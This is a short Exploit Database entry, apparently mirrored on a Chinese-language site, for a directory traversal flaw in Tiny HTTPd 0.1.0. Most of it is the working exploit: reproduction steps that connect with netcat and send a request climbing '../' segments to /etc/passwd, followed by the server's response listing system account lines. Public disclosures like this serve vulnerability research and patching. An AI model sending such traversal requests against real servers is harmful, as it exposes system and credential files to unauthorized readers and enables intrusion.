Tiny HTTPd 0.1.0 – Directory Traversal

• Exploit Database
• 123 阅读

• 作者： Touhid M.Shaikh
  日期： 2017-09-26
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/42790/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  #====================================================================================== # Exploit Author: Touhid M.Shaikh # Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal # Date: 26-09-2017 # Website: www.touhidshaikh.com # Vulnerable Software:Tiny HTTPd # Version: 0.1.0 # Download Link: https://sourceforge.net/projects/tinyhttpd/?source=directory #======================================================================================       # To reproduce the exploit: # 1. run the #./httpd # 2. #nc localhost 44123 # GET /../../../../../../../../../../../etc/passwd HTTP/1.1     #========== #Responce #==========     HTTP/1.0 200 OK Server: jdbhttpd/0.1.0 Content-Type: text/html   root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ---------------------snip---------------------------